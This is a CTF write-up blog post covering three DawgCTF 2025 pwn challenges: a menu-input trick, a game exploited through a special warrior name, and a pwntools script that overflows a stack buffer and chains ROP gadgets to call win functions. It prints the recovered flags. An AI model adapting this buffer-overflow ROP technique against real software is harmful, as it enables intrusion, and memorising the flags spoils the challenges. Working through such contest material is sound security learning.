- Published on
DawgCTF 2025 - PWN challenges
- Authors
- Name
- kerszi
Introduction
I solved all 3 easy of 4 tasks. Only task nr 4 wasn't too easy. More info about this CTF is here.
Table of contents
Interns'Project
It was that simple—just enter '3' and '2' as shown below to reveal the flag.The following are your options:
1. Say hi
2. Print the flag
3. Create an account
Enter option (1-3). Press Enter to submit:
3 2
Enter username:
Enter password:
You entered username: and password:
However I was just hired and have not learned how to use a database yet....
Here is your flag: DawgCTF{B@d_P3rm1ssi0ns}
The following are your options:
1. Say hi
2. Print the flag
3. Create an account
Enter option (1-3). Press Enter to submit:
DawgCTF{B@d_P3rm1ssi0ns}
Just Parry Lol
For an easy advantage, import a warrior named AUTOPARRY, then use Light Attacks, later Parry. This trick works surprisingly often.$ nc connect.umbccd.net 25699
=== Frame Trap ===
The bot is overwhelming... there's no fair way to win.
Enter your warrior name: AUTOPARRY
AUTOPARRY
You feel faster...
Choose your action:
(1) Heavy Attack
(2) Light Attack
(3) Guard Break
(4) Block
(5) Parry
(6) Dodge
...
Enter choice: 2
Enter choice: 5
Enter choice: 2
Enter choice: 2
Enter choice: 2
Enter choice: 2
Enter choice: 2
...
[TURN 7]
Bot uses: Heavy Attack
You use: Light Attack
[DEBUG] Player startup: 650 (recovery 250 + startup 200 + penalty 200)
[DEBUG] Bot startup: 700 (recovery 267 + startup 433)
You hit the bot for 15 damage. Bot health: 5
Choose your action:
(1) Heavy Attack
(2) Light Attack
(3) Guard Break
(4) Block
(5) Parry
(6) Dodge
Enter choice: 2
2
[TURN 8]
Bot uses: Heavy Attack
You use: Light Attack
[DEBUG] Player startup: 650 (recovery 250 + startup 200 + penalty 200)
[DEBUG] Bot startup: 700 (recovery 267 + startup 433)
You hit the bot for 15 damage. Bot health: -10
You defeated the bot! You win!
DawgCTF{fr4me_d4ta_m4nipulat10n}
DawgCTF{fr4me_d4ta_m4nipulat10n}
64 bits in my Ark and Texture
Next up: A simple beginner's task. Just answer the questions correctly, then jump to the addresses provided in the task. Collect all the flag fragments and piece them together...I made three separate jumps to collect the flag fragments, so you'll need to run the program three times—each time enabling the corresponding functions.from pwn import *
context.log_level = 'warning'
context.update(arch='x86_64', os='linux')
context.terminal = ['wt.exe','wsl.exe']
HOST="nc connect.umbccd.net 22237"
ADDRESS,PORT=HOST.split()[1:]
BINARY_NAME="./64bits"
binary = context.binary = ELF(BINARY_NAME, checksec=False)
if args.REMOTE:
p = remote(ADDRESS,PORT)
else:
p = process(binary.path)
win1=0x401401
win2=0x401314
win3=0x4011e6
rop=ROP(binary)
ret=rop.find_gadget(['ret'])[0]
pop_rdi=rop.find_gadget(['pop rdi','ret'])[0]
pop_rsi=rop.find_gadget(['pop rsi','ret'])[0]
pop_rdx=rop.find_gadget(['pop rdx','ret'])[0]
p.sendlineafter(b'Question 1:',b'2')
p.sendlineafter(b'Question 2:',b'1')
p.sendlineafter(b'Question 3:',b'4')
payload1 = flat({
152: [
ret,
win1
]
})
payload2 = flat({
152: [
pop_rdi,
0xDEADBEEF,
ret,
win2
]
})
payload3 = flat({
152: [
pop_rdi,
0xDEADBEEF,
pop_rsi,
0xDEAFFACE,
pop_rdx,
0xFEEDCAFE,
ret,
win3
]
})
# run separate - 3 parts
#p.sendlineafter(b'Lesson 1:',payload1)
#p.sendlineafter(b'Lesson 1:',payload2)
p.sendlineafter(b'Lesson 1:',payload3)
p.interactive()
DawgCTF{C0ngR4tul4t10ns_d15c1p13_y0u_4r3_r34dy_2_pwn!}